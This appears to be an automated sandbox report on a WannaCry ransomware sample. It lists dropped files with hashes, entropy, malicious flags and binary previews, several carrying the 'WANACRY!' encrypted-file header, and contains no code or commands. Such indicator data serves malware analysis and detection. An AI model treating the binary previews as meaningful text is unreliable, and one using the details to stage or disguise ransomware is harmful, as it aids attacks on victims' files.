                                                                                      Preview:WANACRY!....^.0v(.&...." ..C&.mE.i'..`.o....H.u.![_....yE4.if......l..=d..M.%.2[...w;...T'2|..?N.&$.xBQ.r.+`...h..m...{%..f..T....;.....8....?w]o..........7..+..gMy..b{.r)*.&I....rPi..7rf..5.?....Yo.K.K...w;. J..@..mY..k.C<..$mF.......B...8...0....Gm:.............1=.Q%....{/.@...>9..x+..u...s.Y.:....K.V.n..L...=m......f....;[...|.;....a.8>...=T....3M..e;...:..I....I..0A.L..d...._.]C73}/.n.O..R3.".K....V1.........a.......g.^V....Xt<T.v....e}qS..5...A....t..z!s..1....0~.....t.uR..m.A........qF....i.<.S*....K.%.*.h......t5:......:.f....[f.dg7...J..*.e...K.d.._..Qn.._q.{.6M.H...6.."lm.)....&fb...jb..\."'%.n.n.r.5oE.L...m.i.4.-.cNz.n.\i.s..... M_.qm.(".&k.W.1Du7^....'!........3l[:...!z..b...(..t!.~j..5..O>.R...*..|..Q.Z;.&#....Q...Qm...~2v.>....(...4.)i3.....B#3.%...8z)Jw..G.}BzE...o[.."7v....(.(k......X.S..?..A.@F.a..@.im..X..Y....O..r......B...^....95..3S.T.%.6......h.....Vm...v0...\........=&S..A.L.m..E.........(.m........=E.k..O..l..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.776571950062159
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:s7PDXTmCAQYbYJZ0KxSF/ggkfePvcj6pFdCwtTc9Mpeq5/vU:snDVAQYbYTSFGecj6p/ZeuemM
                                                                                      MD5:DF7500BA47BA8EC35A92EE921F7EADE5
                                                                                      SHA1:0A6823652E15F97A1E1AB50214AAAF5D00253BE6
                                                                                      SHA-256:A7F23FD0815134FCCBF4B172506F2A62E7B93F83D0DE1EDBC59D1EB932616332
                                                                                      SHA-512:803CF58422A3FF78C37352222F268AD62290543DCFD7FBF10C9727462BE77E87F793361350AEA48FF17724AEA486C006BC7469EC29FCDAB7F75662F8D315DC2F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:*..c..S...;..^..1......R.i)....r{..g.."$].......J.v^.;.{.4...b...._.P..].'.iIfd....`.".6(..p?....Rv..G...u_...u.#..BT... R.............q...fiL..V..;.v;z;...hE}m.WA...P..c.2..=L.h?.g.M..iACA..[M.`..p.b.Z.P..X..O....C-./.X.H.FuLO}7......Q...$Yh.Y^..h....D/$v-..w....@o.$...k.$Mj.M.H..>..*.@...$`VI-.5..!.h....'!.1-_.".L@E.....(.YPl48.I]..D.?.?...N8..._........%.~u.pk?b./&..\..^@T....].e.`k.....).s....i|X.N,....*.H..n.UR.. -.s.)...-...z2..=..r....`.Dg.M....[)w.o..s.s.MIX....V.J'...Td.e@..3L.*u...'.E...n..B+"..~..w.y\..........#T...'#..{..eo../...S.b....v..`uD...l...7z`..$S.[.=...P(...d.#..u.Y.kV.j;.M7G...C..)..>.).\....C..Lq.V. ....#O.Q.q..../...NR..c3.iV......KO.1._"zFY...E....A..V.W.&U.;0[Z.......-.......%r....ab..%/...V....w%vS.$+..Z.b%.`.L....0.i`.;..W.."...`C..!..Wk...`Xx'EHt../..id..G...").1lJ..........f.YO]Y........N..9: ..M..v...F0../.z.:...E..KX...E..%1.G.Hs...7..?.1..as...j.e.....s.#Sv.W..4.><a.2.i................\..'|y.s...i.R
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.791911444712755
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkSeP7J+X92uI1mY/T+oH1wspt21wb7xflHh3W700uuMuSEYGUsLVtvuESN0ae7e:bkzP7c/Gv/qoV21kf9I00uuJYGRLPueQ
                                                                                      MD5:D48790379DA7F393B37D2784463BA642
                                                                                      SHA1:7FC5D96A923C013D1CF959F17F4032D2DD148576
                                                                                      SHA-256:24C342FFFE4EBD5F3F7C9FDD66971CB6AE7194C846C06BC91D630BC8C4D7EB5E
                                                                                      SHA-512:0D1464098C88864FD976C0C168E4C81C6D86A958626528C60AE830750D8C347E777E2EC4F8FF4A208CF7405DB43D828CB7D72BB9446C756AC276502225D5E051
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.............%.D<.7]..y....-...!F-m.._....D...leB...T.qm...#r..K px.>.O.7Ny.$..%..]...m...g..*7..m.X5.}.+O..F.x...ON........@2.j..:.X.0."..b..=........7.f.>WJ.b?..M.4.......Z=....;*.G......$~.}.e....S......&.f.:-...........*...a.....` [.w..W*I.5............G.Yh.IJb.....9.. .{..}....u./Du.T..g9f..?.JWN.#..,......?....}(.;...S........yC..N........t/...j...^M...Z@..g..A.UE.2#..2...=|f.InC......V...Q....../..{.u......R...m.).......Vy......m...]..A_...L.p...A..ronhz...pL<.s..a.W.m.3.*.......G....4P|....N.B.WA*C).jo .3....{.....;..>......D....pn.8......T.h..;...b.A......w..a.Y......`{.Z?....0.W.....(.X...cj...-.h...BkI...p..b:.3\..#....,Y.B.+..<...u...Q.c7.\..h.,G^....l.c......:z......Y.W,..Z..rb]%b...jZ.~....3.....*.Zw..Ub%..^...sf.._...z.N}.w.Y.o....H..$..(...@C..H..Bl.R"....m.k..a...qv..@@=\Bh..C./....;.z..G..}.....\.=.C.-.IOj..w..l.....?2...E.....CM.......0)...9.....CBN...tm|."....O.....R..&3...[i....W....{E)..{.?#....5.ee..^. {n.F
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.791911444712755
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkSeP7J+X92uI1mY/T+oH1wspt21wb7xflHh3W700uuMuSEYGUsLVtvuESN0ae7e:bkzP7c/Gv/qoV21kf9I00uuJYGRLPueQ
                                                                                      MD5:D48790379DA7F393B37D2784463BA642
                                                                                      SHA1:7FC5D96A923C013D1CF959F17F4032D2DD148576
                                                                                      SHA-256:24C342FFFE4EBD5F3F7C9FDD66971CB6AE7194C846C06BC91D630BC8C4D7EB5E
                                                                                      SHA-512:0D1464098C88864FD976C0C168E4C81C6D86A958626528C60AE830750D8C347E777E2EC4F8FF4A208CF7405DB43D828CB7D72BB9446C756AC276502225D5E051
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.............%.D<.7]..y....-...!F-m.._....D...leB...T.qm...#r..K px.>.O.7Ny.$..%..]...m...g..*7..m.X5.}.+O..F.x...ON........@2.j..:.X.0."..b..=........7.f.>WJ.b?..M.4.......Z=....;*.G......$~.}.e....S......&.f.:-...........*...a.....` [.w..W*I.5............G.Yh.IJb.....9.. .{..}....u./Du.T..g9f..?.JWN.#..,......?....}(.;...S........yC..N........t/...j...^M...Z@..g..A.UE.2#..2...=|f.InC......V...Q....../..{.u......R...m.).......Vy......m...]..A_...L.p...A..ronhz...pL<.s..a.W.m.3.*.......G....4P|....N.B.WA*C).jo .3....{.....;..>......D....pn.8......T.h..;...b.A......w..a.Y......`{.Z?....0.W.....(.X...cj...-.h...BkI...p..b:.3\..#....,Y.B.+..<...u...Q.c7.\..h.,G^....l.c......:z......Y.W,..Z..rb]%b...jZ.~....3.....*.Zw..Ub%..^...sf.._...z.N}.w.Y.o....H..$..(...@C..H..Bl.R"....m.k..a...qv..@@=\Bh..C./....;.z..G..}.....\.=.C.-.IOj..w..l.....?2...E.....CM.......0)...9.....CBN...tm|."....O.....R..&3...[i....W....{E)..{.?#....5.ee..^. {n.F
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.788831827307464
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:d0K8geXzXbXuEBBFcZTpDaNdQSnW3ytfHOD:dMgwL+EBoTpsyP
                                                                                      MD5:E659098F67113E6C7359D7ACAAB6C3C5
                                                                                      SHA1:AA99E9EB6DF7D40CEA2805165AE58803219FA232
                                                                                      SHA-256:31F160C501F65185ABEA1BB6A6DF69F93DCF2DAAB615BABDB9569298212CCCA4
                                                                                      SHA-512:5F37268E3E0854C389C4AA5D415693BDC06D5D4B995A9DC2E2B66D649F5517221A88480FE22F265880E386081F28D4002CE459B750140B4336429D3A985AD5E0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.7qbT}X..>@@..^...4-...!S......[..$..d........oI.&G+.K.s.A:..^...9.]..........sVA7..2.`..S... K.....-...M..".0......t@X+.W_....q..(`.....Gp...A.p....).N.....\.-=R...&.G'f.F../$..z.x..@.[.+..q.2.[..A.|n.k.6..52./...4.o.F....:u9.......{Q... ...1&TW.Y.4...Zd2:...V.P;Y.(....nq..aF.-k5....]...j.bu.2S....Ujiq..o<2..g|..Jq.%}.?....)d...A...M....W......=....}_.j.....az^}T.........@.#k.~...:._\....)5.K.h(...<!.Nw5j.7b&.+[..,3.Y..e.d......30.a~......%...Q2.U.X.L.......p,.._.@.t.k?._.#..L../.H...3....W.&.q.\..>...7.B....2.+.....=...=I...9..........S97..Z._e.Sg.7b.y...i..)....y..o..E..<..[k..+..O.5M..>.....f....J....-"0.s..Y[.-...x..UP2...5mt(...]..#K......f.;... .e#In..U..!.v..kB...R...M..Z....u.o....<...x.b.x..F......d.B.....oP.*.J..{0.....hMfj...U..xwe..AT..E....!4;.....l.2g.Ov.-..n...-.... .........]H.*.+s..Ou..@.r......!...... .....h...b.............@..3.5..3M.#.6...b....\1j.c...9f....".....j.[.;..*.oK.....Ec.R..2..9.....?v..K'd.0f....Q...n...&..1b.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.846560481556939
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkv+ORC280ykDcCk92lSQw9//0XjAKbLmxMNTf9voCF0PPDCa+xiuuLH3Lb0O7:bkwFZAcC3SQGAjgMBf9voCFmOrxiuUHn
                                                                                      MD5:BC2F580A26579BD226C399A67B383005
                                                                                      SHA1:50E155FEC8D0260949CFDDCA2CD5815FB378406B
                                                                                      SHA-256:86436041DEF193190CA1F46835FC349F971F48B10F8EBA5B766CA624FC22C7AC
                                                                                      SHA-512:D11BF48EC228CA8BDE405A53056642B399132C77DE16D84E699393ACA4E13EB50679EA8824F429999FB1BF109169123A37CD4E82ADB12118070584D3D9A09AF1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......p.,P....-....f.H....\.F.i.;...).M4.... >...VyZ......U...;...Wx-J.e0.e..........rF........2.p.N9O3.@7.f../.{.....|../^.{2..C5....#7pn..=i.&^.w..C-/..S,...M.I..oH(....8...T......2...I.$.{d......I./.. R.mw.y..~1.?.5..7A.._.....fW.1...................ns..7.i.L....>|.......Gn..wY-O.E..P.h..e.>.&...|g...{..#...)j9...HjM...\H.(.y.. .S.#.......y....K...[..@.7.9..{(..Hc...[....../...U..m.z...Z2_[.M^....t...?sS.3...@.B....y.J...J........Y...W..V=...Y.Q.....m.gM.._.vi.Ur..Y..,..........d.;Y..h...>..n...Q....q...0.q.b{l.[).F...s.g..(`6......>....[AR.....z_.ME..7.....,....;.7.xL......Q+.~..P.O....U..-I(<o.I......bG......tH..<r.}.]".Rk.+.+...Sc..,......A._. ^FfK..O..))8?..A.%...Ez..k.v..`\v.r..N1 8.=MO........+.#...Q..!...F#..`...5..c"^. ...,.M.b.0O.f.J.........,B.D;YM.']..pY....r.Vk..G.-..q..u..D.R..U.&f5..2...<z.w...7[......I........+..9.A`.b.Mo..&.!.....a......l,Ion..m...8e.b.]A.x.q}...}.-j.K.K.;..4..j...UM......l....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.846560481556939
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkv+ORC280ykDcCk92lSQw9//0XjAKbLmxMNTf9voCF0PPDCa+xiuuLH3Lb0O7:bkwFZAcC3SQGAjgMBf9voCFmOrxiuUHn
                                                                                      MD5:BC2F580A26579BD226C399A67B383005
                                                                                      SHA1:50E155FEC8D0260949CFDDCA2CD5815FB378406B
                                                                                      SHA-256:86436041DEF193190CA1F46835FC349F971F48B10F8EBA5B766CA624FC22C7AC
                                                                                      SHA-512:D11BF48EC228CA8BDE405A53056642B399132C77DE16D84E699393ACA4E13EB50679EA8824F429999FB1BF109169123A37CD4E82ADB12118070584D3D9A09AF1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......p.,P....-....f.H....\.F.i.;...).M4.... >...VyZ......U...;...Wx-J.e0.e..........rF........2.p.N9O3.@7.f../.{.....|../^.{2..C5....#7pn..=i.&^.w..C-/..S,...M.I..oH(....8...T......2...I.$.{d......I./.. R.mw.y..~1.?.5..7A.._.....fW.1...................ns..7.i.L....>|.......Gn..wY-O.E..P.h..e.>.&...|g...{..#...)j9...HjM...\H.(.y.. .S.#.......y....K...[..@.7.9..{(..Hc...[....../...U..m.z...Z2_[.M^....t...?sS.3...@.B....y.J...J........Y...W..V=...Y.Q.....m.gM.._.vi.Ur..Y..,..........d.;Y..h...>..n...Q....q...0.q.b{l.[).F...s.g..(`6......>....[AR.....z_.ME..7.....,....;.7.xL......Q+.~..P.O....U..-I(<o.I......bG......tH..<r.}.]".Rk.+.+...Sc..,......A._. ^FfK..O..))8?..A.%...Ez..k.v..`\v.r..N1 8.=MO........+.#...Q..!...F#..`...5..c"^. ...,.M.b.0O.f.J.........,B.D;YM.']..pY....r.Vk..G.-..q..u..D.R..U.&f5..2...<z.w...7[......I........+..9.A`.b.Mo..&.!.....a......l,Ion..m...8e.b.]A.x.q}...}.-j.K.K.;..4..j...UM......l....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.810470550061417
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:AL1mL6gQpODGLlwOUsd6kMge/DnbEJ69pkgduywrSJ1jsESa3:g8gp8SlBUsd6zRfEMvwrEsE
                                                                                      MD5:973A618372EB87C1380197455C6A1E8F
                                                                                      SHA1:5F7C4757807D10E5832D290493E641D1B0D29AE9
                                                                                      SHA-256:E9EA6407D7382E68B84C1FD0E4425258FA91B19DCCD7A10BFE53EB15101D7E80
                                                                                      SHA-512:C69BA24EEBA62E1D609C5D049A7EAC9631031BF4FE2090CE2E958C0EF3ABC85C3FA6493B72F90C4EC0506354D9BA15E0F1483DA1741DF25103A44990A391064A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.j..{.f..y|.#.Z..5..s....]N....6...........K.-/...b.e(.C.?..|}j.B.LM{x..#E.a..).X..YH..j:.....I..c4S..),.Kx.)"F.....).V. .!%.Y....=....S.vm."..,*XJ."..%....x..G.I./@o..)e..]|-......b1P..w.....r.....K.~n.1....!.........S....|......s.Y..w.?...Y..7.D$.8.G...-k.!2.I.c.z..........h...g..e.........v.K.b>#Bo.h.....)Q.j.b..L.........W.T.....3..W.f1d...|x...s...rE{.o...C.L....g..........`....KXpC..s."~../....y..5.r....q.oY..X.>%0.......Dg.R.8............&.H......1{....k..G..A.*bg.|8&.MW....<.r}.zi..35R..j%.....j.O..8j0..:.......a...y.aNa.[...y1.j...`M..[..2..+..G.%6..O.B.V...fLY.:......"..JWM...|u$.*ua.u..O..h..C.m.i0K....CY...=....?V7......1.L..b.Kb.[...........=..4$ ...x}.c!...C.....e...d..=.qC].Xk.........B.It...:.{..1.<..W.)..y..jtI..Z..<..R?o........H.7...#......".F....d.;....G..FR...A..;..}...==XosQ.Q..j..._..N.h.=p...:B6.E%.4...A....(K.o#f%...&>...4j.^U.....i.1...u..]....nF'!..c.]E!dW.......7h.k....,...Z>.^..@NXvX33...L..6rt.N..1..#e/
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.826021128158441
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkMTX93BreRFWKrx/mYkcs8shRJC0tLPRvqiFFw0u0M8OH:bkMTtBSRQMLs87mgH088W
                                                                                      MD5:2CA84030981328CEFC13552DC893C57C
                                                                                      SHA1:0CE452B4BC49A88F43368ADBBA3EB229D208BCE7
                                                                                      SHA-256:64B80D5E58012C600E11B1DF990EB8C195F9B7E5AE64AC3AC23442F42CF34739
                                                                                      SHA-512:0304C65C26F929E0D19FAA82C7210AE043D4C0D69E7CB371565FE13222F970FA3A61C29A2EF94379DD045465971E1F9B299987D2192BCDA9C74A41055E4C619B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....1..:.......qe%...tl=+....J3.2c<Ju.<.uHo...\h.7..... Q.....3i/U...Vf4..b1..q.m...)2..W.4.Jx......`.....|.[.....]0...l...R.H44..'.2....7..y.,.S/QD9.......Wf..7T..#.%...7......../.{...?.lRS.,.P:[.`...G=F.R@...8|.......xY.N.....zpXQ..0..f:....gF.e<3...............s.HH`%..Q.E..."..^..f.jl.B.x....w..........i.<sr$.L.2zR.9...h$....pD.D..\..T.)....n....'..0,.7.......... .?..J~...J.a.R...L.......,....L..3....x...J.U...66.+.i?.).G;.H|L.. ..=...+7..k^..zX^.....f..G|\,h. %.L.....(.,2.j.n.]........e{i:....+..8>..r..A~...:4.+..+..o..y.4TE...53...69k..C.&..o._.O:....Z..-K...(..i....[Lv.....g8...E."/d#&..He&.Q......ss.v.#^B...5|L.C..v^0...0...e.|....z...o.n:.+.G@Z.Y.*...L.) ^.............Kz.<....S.....T6!Kd%.y...-L..R...=12..\..E.CIX...S.|Q..-C}.....F.....+my....q.Z3$C...*.T-.3xa.....Ec..,C....2...&..L)n4~'r..k......Y..t.)6.Gw.q.qms..o..B.8.. H .`..S.~........D.y3\.[.o.....@`t#.9.........}.......kg5...t%C.W..P.|....P.T.>.......E.\.h.,.Sl....$.1j
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.826021128158441
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkMTX93BreRFWKrx/mYkcs8shRJC0tLPRvqiFFw0u0M8OH:bkMTtBSRQMLs87mgH088W
                                                                                      MD5:2CA84030981328CEFC13552DC893C57C
                                                                                      SHA1:0CE452B4BC49A88F43368ADBBA3EB229D208BCE7
                                                                                      SHA-256:64B80D5E58012C600E11B1DF990EB8C195F9B7E5AE64AC3AC23442F42CF34739
                                                                                      SHA-512:0304C65C26F929E0D19FAA82C7210AE043D4C0D69E7CB371565FE13222F970FA3A61C29A2EF94379DD045465971E1F9B299987D2192BCDA9C74A41055E4C619B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....1..:.......qe%...tl=+....J3.2c<Ju.<.uHo...\h.7..... Q.....3i/U...Vf4..b1..q.m...)2..W.4.Jx......`.....|.[.....]0...l...R.H44..'.2....7..y.,.S/QD9.......Wf..7T..#.%...7......../.{...?.lRS.,.P:[.`...G=F.R@...8|.......xY.N.....zpXQ..0..f:....gF.e<3...............s.HH`%..Q.E..."..^..f.jl.B.x....w..........i.<sr$.L.2zR.9...h$....pD.D..\..T.)....n....'..0,.7.......... .?..J~...J.a.R...L.......,....L..3....x...J.U...66.+.i?.).G;.H|L.. ..=...+7..k^..zX^.....f..G|\,h. %.L.....(.,2.j.n.]........e{i:....+..8>..r..A~...:4.+..+..o..y.4TE...53...69k..C.&..o._.O:....Z..-K...(..i....[Lv.....g8...E."/d#&..He&.Q......ss.v.#^B...5|L.C..v^0...0...e.|....z...o.n:.+.G@Z.Y.*...L.) ^.............Kz.<....S.....T6!Kd%.y...-L..R...=12..\..E.CIX...S.|Q..-C}.....F.....+my....q.Z3$C...*.T-.3xa.....Ec..,C....2...&..L)n4~'r..k......Y..t.)6.Gw.q.qms..o..B.8.. H .`..S.~........D.y3\.[.o.....@`t#.9.........}.......kg5...t%C.W..P.|....P.T.>.......E.\.h.,.Sl....$.1j
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.79677936759439
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ukZfZBd+iUZZf5YfpgRDqpoHNzEIQTDRxkEGZ9q0gb:X3+iUZ1KfpghqUpQf7Gytb
                                                                                      MD5:FCF52C15AF94EB63F8EE8E6A76551B0A
                                                                                      SHA1:71A4A917C6501686ED021B5F0074B4F1A95B7B29
                                                                                      SHA-256:86EE084203EDF5DABFDA53D7ED2BC250DFA2B48962001A702BFE3F4B699110BB
                                                                                      SHA-512:57D6363CAD641FB0A3E571EE8F8500FF814A7BC54E5FC09F9B836DD100FB62C91AEE112F76802E6B5965829412E9CADC8DF8A164643E0F3778A0515017DD9DC5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.x...x.p.&:G..f.1.w....).;..9.+.Q...qqI.I.Wj.#.F...u.i..'..&P....u......#l'." .....T..0..C.-..G..)...lWR.R.)..C._...%.._.?.Z.|&..G.........]LZ.W.|,.q@.7.N}..x...7*...'^...m7..M.I...:S.....S?d3]..k....LW`..T...w!.a..>=.Gr..4..4..rb..m.p.8y7xq..U....8u..(^.l.e..Sp..Fw9....=.+C^...[.h.t.f...a........>p......aF....8..jZ1^[.......(L......Fe.....Q;V./.+.E......r`.23..m.&.w. .?t.L}._..{.%t.&J.3....P.cE}..$..>.;<f..A.......r.@.Z.........x.....|.t..^5.p..9v...?.....V.u.?.".l..X.:v.).+..v....{.#&2;B..gPB....P.)_....h....._p....j@...|.\.0.\.y..'.$*.z..,...........St.T.$._y..9mt..\>Y.....P....0.Z.n@.K...CHr..)I..kX......_7...6N.qU.T|]9......./..1..)h...-..=2.s...$9.a_.P...j>.9..h....../.....M...5t.]....H.l..1...&.6...Vx...'..?..,.Bi..Y...^..N...@.... ..'>.9.....M...k...YNX...ojZ...F.tv.8...Vu.v......AeJ..K.^q..a2r.q-<..._...@.Z....[.B.x.b.,..t.aT...{3.2].J.H6..K:..b3..!..`_..!%.T..M..{.Pf.@_.5..C..DZ...$...#.k5.n..S.....N.I?.....M.._^...1..V.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.841834840081658
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkoUCd79WXBEtIG1ahtoAvYmc/h1I/+Q+1YwOVnTE5kxhZewTocUMn:bk50KKSU2toAO4/+Q+1YwsckBgcH
                                                                                      MD5:4459AE2C94EDCA85E37520D618490681
                                                                                      SHA1:090268DEC94686CCEDEAA2EC5F2E0DBBCB44B4D4
                                                                                      SHA-256:FB2BC1E978C4777BB096D1730405B062C29840B0121874016A48EEC178B31434
                                                                                      SHA-512:CE6478223563D9F1B45FE9A9D4D82CE1C800005572347D5126A0ADBD4612CAA7764954D049CA6293F9B8B21867CDAB0898CE5C430931DB4A586EA33ED607C979
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....R..XZ..n.Kssl.Z%...{......s.x...p//;......'..d4_C..xg..}...x.=..L`.Q.~...(.,..}TQr....o....D..Q..~.......D..~1....i...0X.i\._x..4%.4;.XN?&;..{]_4.5[.Qe3.x.X.j.=(z.....|.R.<h9.>h.../U.fIr.\.B..U.~.6.].>.."...3R@AP....%..R.j..'.C.G..V....V@j.vE.............ck.U+.<..(M~:.........#...... D..x..;..q.8..p.9Z...5.1."...<.v.....k.+.M....:....L89B.l.E.G...}EL...}.+...;.....G...:..K.f[...|..<...ScAT...9.8.O...c$JF.....e..0K..S.iS..c%.O.&*N:A...q....1......6(h@A......)I..H..4.NB.!J..7.^.@...=..L^.AR.5q.......<<...J....y.o..l.^`...r.e.U.6..M;.....mQ.1.(..c<I/..5._G.w.....8h./.....y<9>....W~.ja.=4.{.]..]..12...r..G....'|Q..)......id).4.rU.e...n.J..ZY......-.........;.....w2...[.$....uY.4>..1.V.&l.X`.?......)<.=S.1...j.>t7v8.T;..D.........<^..7un..+K..a8/..y......t.9....R.N..Wi."....lL....k....l..[.s.Sp.c1.k.;......?Z..F.1.i&T{4..k.?.'..3x~|F.......=O#....19......\+Vc...E{o........(...sT.,~.MD.k.6...av....n..........;wd&...(.....@\N83K~.5..T3.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.841834840081658
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkoUCd79WXBEtIG1ahtoAvYmc/h1I/+Q+1YwOVnTE5kxhZewTocUMn:bk50KKSU2toAO4/+Q+1YwsckBgcH
                                                                                      MD5:4459AE2C94EDCA85E37520D618490681
                                                                                      SHA1:090268DEC94686CCEDEAA2EC5F2E0DBBCB44B4D4
                                                                                      SHA-256:FB2BC1E978C4777BB096D1730405B062C29840B0121874016A48EEC178B31434
                                                                                      SHA-512:CE6478223563D9F1B45FE9A9D4D82CE1C800005572347D5126A0ADBD4612CAA7764954D049CA6293F9B8B21867CDAB0898CE5C430931DB4A586EA33ED607C979
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....R..XZ..n.Kssl.Z%...{......s.x...p//;......'..d4_C..xg..}...x.=..L`.Q.~...(.,..}TQr....o....D..Q..~.......D..~1....i...0X.i\._x..4%.4;.XN?&;..{]_4.5[.Qe3.x.X.j.=(z.....|.R.<h9.>h.../U.fIr.\.B..U.~.6.].>.."...3R@AP....%..R.j..'.C.G..V....V@j.vE.............ck.U+.<..(M~:.........#...... D..x..;..q.8..p.9Z...5.1."...<.v.....k.+.M....:....L89B.l.E.G...}EL...}.+...;.....G...:..K.f[...|..<...ScAT...9.8.O...c$JF.....e..0K..S.iS..c%.O.&*N:A...q....1......6(h@A......)I..H..4.NB.!J..7.^.@...=..L^.AR.5q.......<<...J....y.o..l.^`...r.e.U.6..M;.....mQ.1.(..c<I/..5._G.w.....8h./.....y<9>....W~.ja.=4.{.]..]..12...r..G....'|Q..)......id).4.rU.e...n.J..ZY......-.........;.....w2...[.$....uY.4>..1.V.&l.X`.?......)<.=S.1...j.>t7v8.T;..D.........<^..7un..+K..a8/..y......t.9....R.N..Wi."....lL....k....l..[.s.Sp.c1.k.;......?Z..F.1.i&T{4..k.?.'..3x~|F.......=O#....19......\+Vc...E{o........(...sT.,~.MD.k.6...av....n..........;wd&...(.....@\N83K~.5..T3.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.806294829430766
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:PrpA7eLLChm7fM+2f1gCF5368itxsln0S8+Rpg:P1A7eLLChWf32WgHYxAn0S8V
                                                                                      MD5:81053448221255AE19F1438F14670ECB
                                                                                      SHA1:16EB6CF2CFAEA8FB33036644BF6EC9DC1B6295AD
                                                                                      SHA-256:E292FCB609D0B2EE25A5F20E654032E87A3CF839F57D10E5F7F6A73613AF2E17
                                                                                      SHA-512:B558625AA2DF3C7252B1ACDEB1CD12A3B953F83E500B2DD9D0896E56076DB65E58A8FD133A39F9A16B25EB98B9AA642AA614BC0DD8CEE1F2EAB2B657DA4ACD66
                                                                                      Malicious:false
                                                                                      Reputation:low
